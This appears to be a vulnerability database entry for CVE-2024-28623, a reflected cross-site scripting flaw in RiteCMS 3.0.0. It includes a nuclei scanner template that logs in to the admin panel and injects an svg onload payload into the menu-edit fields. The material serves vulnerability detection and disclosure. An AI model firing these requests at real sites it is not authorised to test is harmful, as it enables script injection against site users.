Lucene search
+L

RiteCMS 3.0.0 - Cross-site Scripting

🗓️ 08 Sep 2026 09:47:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 68 Views

RiteCMS 3.0.0 has a reflected XSS in the main menu edit section from unsanitized input.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for Cross-site Scripting in Ritecms
4 Mar 202403:37
githubexploit
circl
Circl
CVE-2024-28623
13 Mar 202409:26
circl
cnnvd
CNNVD
RiteCMS 跨站脚本漏洞
13 Mar 202400:00
cnnvd
cnvd
CNVD
RiteCMS Cross-Site Scripting Vulnerability (CNVD-2025-21552)
15 Mar 202400:00
cnvd
cve
CVE
CVE-2024-28623
13 Mar 202400:00
cve
cvelist
Cvelist
CVE-2024-28623
13 Mar 202400:00
cvelist
exploitdb
Exploit DB
RiteCMS 3.0.0 - Reflected Cross Site Scripting (XSS)
18 Aug 202500:00
exploitdb
kitploit
Kitploit
ritecms
8 Sep 202619:28
kitploit
nvd
NVD
CVE-2024-28623
13 Mar 202408:15
nvd
packetstorm
Packet Storm
📄 RiteCMS 3.0.0 Cross Site Scripting
18 Aug 202500:00
packetstorm
Rows per page
id: CVE-2024-28623

info:
  name: RiteCMS 3.0.0 - Cross-site Scripting
  author: 0x_Akoko
  severity: medium
  description: |
    RiteCMS v3.0.0 contains a reflected XSS caused by unsanitized input in the main_menu/edit_section component, letting attackers execute arbitrary scripts in the context of the victim's browser.
  impact: |
    Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
  remediation: |
    Sanitize and validate input in the main_menu/edit_section component, and update to the latest version if available.
  reference:
    - https://github.com/GURJOTEXPERT/ritecms
    - https://nvd.nist.gov/vuln/detail/CVE-2024-28623
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-28623
    cwe-id: CWE-79
    epss-score: 0.01317
    epss-percentile: 0.68925
    cpe: cpe:2.3:a:ritecms:ritecms:3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: ritecms
    product: ritecms
    fofa-query: title="RiteCMS"
  tags: cve,cve2024,ritecms,xss,oss,authenticated,vuln

variables:
  string: "{{rand_text_numeric(13)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /admin.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&userpw={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
        internal: true

  - raw:
      - |
        POST /admin.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        mode=menus&menu=main_menu&edit_item=4&name=faq&title=faq&link=faq&section='"><svg/onload=console.log('{{string}}')>&accesskey='"><svg/onload=console.log('{{string}}')>&submenu='"><svg/onload=console.log('{{string}}')>&edit_menu_item_submitted=%C2%A0OK%C2%A0

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "{{string}}", "RiteCMS")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402207a22f270802d80e4cdeec3a7839faa346a594405589cf3e4dc1dd999f8a7570202207bb2a2e27bd41f9618799c05c315e60999ac70e60344ff7c74ee1385ec424bee:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Nov 2025 07:31Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.16.1
EPSS0.01317
SSVC
68